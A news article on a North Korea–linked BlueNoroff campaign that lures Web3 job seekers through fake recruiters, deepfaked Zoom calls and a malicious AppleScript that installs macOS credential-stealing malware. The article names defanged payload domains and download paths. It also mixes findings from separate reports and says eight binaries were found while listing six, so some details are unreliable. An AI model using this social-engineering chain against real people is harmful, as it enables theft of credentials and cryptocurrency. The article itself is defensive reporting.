BlueNoroff, a threat actor aligned with the infamous North Korean hacking group Lazarus, is targeting job seekers in the Web3 sector with a new malware designed to steal passwords for crypto wallets and other apps from Apple macOS devices.
This sub-cluster within Lazarus Group has previously been tracked under several aliases, including Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, Famous Chollima, and TA444. It has a history of attacking financial institutions, cryptocurrency businesses, and ATMs to generate revenue for Kim Jong Un’s government.
North Korea-Linked BlueNoroff Targets Web3 Professionals Through Fake Job Recruitment Campaign
New North Korean Malware Detected on Wednesday
On Wednesday, commercial threat intelligence group Cisco Talos reported that it had found a new Python-based remote access trojan (RAT) called “PylangGhost” making the rounds in a “contagious interview” campaign, which tricked crypto and blockchain professionals into installing the malware on their personal computers.
However, this is not the first time BlueNoroff has been spotted. Cisco Talos has been tracking the group, also known as Wagemole, since mid-2024. They were identified in several recent incidents where North Korean hackers attempted to infiltrate US-based crypto firms like Kraken by applying for open job listings.
Famous Chollima has reversed its strategy by setting a bait for job seekers and employees with previous experience in the blockchain industry, particularly from India, through fake interview campaigns using social engineering tools.
Also Read: Double Spend Attacks In Crypto: What Investors Must Know
How Does the “PylangGhost” Malware Compromise Macs?
Cisco claimed that the group creates fraudulent job sites and skill-testing pages that mimic legitimate firms such as Coinbase, Robinhood, and Uniswap, where the victims are guided through a multi-step process. Cybersecurity firm Huntress revealed further details of the intrusion involving the employee of an unnamed crypto organization.
This individual received a message from an unknown contact on Telegram, a fake recruiter, who requested time to speak and sent a link from Calendly, an online appointment scheduling software. While the URL is intended for a Google Meet event, when clicked, it redirects the target to a fake Zoom domain controlled by the hacker.
The victim told Huntress researchers that they joined a group Zoom meeting a few weeks later, which included several deepfakes of known senior leadership members of the company, along with other external contacts. When the individual said they weren’t able to use their camera and microphone during the call, the threat actors urged them to download and install a malicious Zoom extension that was shared via Telegram.
They were tricked into copying and executing an AppleScript that went by the name “zoom_sdk_support.scpt”, which first opens a legitimate webpage for the Zoom software development kit (SDK). But under the pretense of installing updated video drivers, the script downloads a next-stage payload from a remote server called “support[.]us05web-zoom[.]biz” and executes a shell script.
Upon execution, PylangGhost disables bash history logging and then checks whether Rosetta 2 is installed on the compromised Mac. Rosetta is a software that allows Apple Silicon-based Macs (M1-M4 series) to run apps built for Intel-powered Macs. The script installs the program if it is not found.
It then continues to create a hidden file called “.pwd” and downloads the binary command “web071zoom[.]us/fix/audio-fv/7217417464” from the fake Zoom webpage to the Mac’s “/tmp/iclpud_helper” directory. It also performs another request to “web071zoom[.]us/fix/audio-tr/7217417464” to fetch another unidentified payload.
The shell script then prompts the victim to provide the password to their computer, enabling remote control of the infected device to steal cookies and credentials from over 80 browser extensions, including password managers and safe cryptocurrency wallets like MetaMask, 1Password, NordPass, Phantom, Bitski, Intia, TronLink, and MultiverseX.
PylangGhost can also carry out other tasks like taking screenshots, managing files, stealing browser data, collecting system information, and maintaining remote access to the compromised Mac. After completing its mission, the malware wipes the history of executed commands to avoid leaving any forensic trail.
Huntress’s investigation led to the discovery of eight distinct malicious binaries on the victim’s computer:
- Telegram 2 – a Nim binary responsible for initiating the primary backdoor
- Root Troy V4 – a fully-featured Go backdoor used to run remote AppleScript payloads, shell commands, download additional malware, and execute them
- InjectWithDyld – a C++ binary loader downloaded by Root Troy V4 that loads two more payloads, one to facilitate process injection and the other to enable the operator to issue commands and receive responses asynchronously
- XScreen – an Objective-C keylogger that can monitor the victim’s keystrokes, clipboard, and screen, and send the information to a command-and-control (C2) server
- CryptoBot – another Go-based information stealer that is designed to steal cryptocurrency-related files from the host’s computer
- NetChk – an almost empty binary that can generate random numbers forever
Development and Cybersecurity Teams of Crypto Firms are BlueNoroff’s Main Target
This is not the first time BlueNoroff has used fake job interviews to lure victims. The North Korean-linked group is best known for orchestrating a series of highly sophisticated crypto heists known as TraderTraitor, targeting employees of organizations engaged in blockchain research with malicious RATs.
Hackers behind the $1.4 billion Bybit exploit from February 2025 used fake recruitment tests infected with malware to target the exchange’s developers. The $700 million Axie Infinity hack from March 2022 was also the result of a similar campaign.
Recently, after stopping an apparent malware attack, crypto exchange BitMEX claimed that the Lazarus Group uses at least two teams during operations: a low-skill team to first breach the target’s security protocols and a high-skill team to conduct subsequent thefts.
Huntress warned that remote workers who are involved in high-risk areas, such as development and security, are the group’s primary target. The cybersecurity research firm has advised companies to train their employees to identify common attacks that begin with social engineering related to remote meeting software like Zoom and Google Meet.
